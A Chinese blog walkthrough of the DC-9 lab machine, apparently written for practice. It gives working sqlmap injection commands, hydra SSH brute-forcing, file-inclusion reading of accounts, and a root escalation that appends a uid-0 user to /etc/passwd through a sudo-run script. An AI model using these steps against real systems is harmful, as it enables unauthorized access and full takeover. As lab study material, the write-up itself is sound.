渗透DC-9-sql注入


0x00 环境介绍

DC-9考点为SQL注入,密码爆破
小黄按照正确思路做一下笔记,其中的弯路就不放在上面了,初次渗透还得多研究研究

0x01 信息收集

1)IP收集
使用arp协议扫描彧存活靶机

arp-scan -l

发现IP
2)端口扫描

nmap -A -p- 192.168.213.147

发现ssh不可用,待后面再继续研究
进入web页面继续收集

发现可疑存在输入输出参数,于=与数据库存在交互
查看源码
查看源码

0x02 渗透测试

这里存在sql注入使用sqlmap进行注入,通过源码查看到交互页面为results.php 指定注入目标

sqlmap.py -u "http://192.168.213.147/results.php"  --data "search=jerry"  -dbs  #查库
sqlmap.py -u "http://192.168.213.147/results.php"  --data "search=jerry"  -D Staff -tables #查表
sqlmap.py -u "http://192.168.213.147/results.php"  --data "search=jerry"  -D Staff -T users -columns -bath #获取到密码字段以及账号密码

*注入过程通过查库查表一步步研究,这里我直接将有用信息提取出来
账号密码

登陆后台
存在文件包含 通过越级查看网站账户目录,提取到一些列账号 密码
文件包含漏洞查看信息
文件包含
其实之前已经通过注入查询到相关的账号
查看源码发现ssh端口服务被关闭,可以通过nc连接端口
打开源码中三个端口连接
端口信息
开启nc
发现的三个端口开启

使用hydra爆破ssh使用之前发现的账号密码
爆破
爆破三个账号
登录三个账号ssh在janitor用户发现一些密码,再次利用密码作为字典,将之前为爆破账户再次提取出来,利用hydra再次爆破
发现密码
再次使用hydra爆破—-发现新大陆
爆破账号
再次登录账号发现目录root权限
发现root权限

0x03 权限提升

这里观察到这个是一个路径,在之前的suid提权网站没有找到相关的搜索的函数提权
发现py脚本
脚本运行作用:将一个文件内容写入另外一个文件(root权限)

提权思路:
那我们可以构造一个aaa用户,将root权限写入该用户信息内,利用test.py将该文件写入etc/passwd即可构造一个新的root权限登录即为root权限

流程:
dc-9:/opt/devstuff/dist/test$ openssl passwd -1 -salt aaa 123456   #输出账户aaa密码123456的hash值

$1$aaa$8LT9tZ2ZqkvmMt74nqBXo0

dc-9:/opt/devstuff/dist/test$ echo 'aaa:$1$aaa$8LT9tZ2ZqkvmMt74nqBXo0:0:0::/root:/bin/bash' >> /tmp/passwd  #写入tmp/passwd 暂存

aaa:$1$aaa$8LT9tZ2ZqkvmMt74nqBXo0:0:0::/root:/bin/bash #按照etc/passwd 的格式

dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/passwd /etc/passwd  #利用提权脚本test.py写入到etc/passwd

su - aaa    #登录aaa输入密码123456  即为root权限

提权成功
NICE!

本文章渗透流程为全部正确思路,初次尝试还得多研究研究😄


文章作者: 告白
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 告白 !
  目录